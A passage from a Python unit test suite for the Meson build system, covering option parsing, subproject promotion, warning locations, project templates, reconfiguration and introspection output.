changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in ('java'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
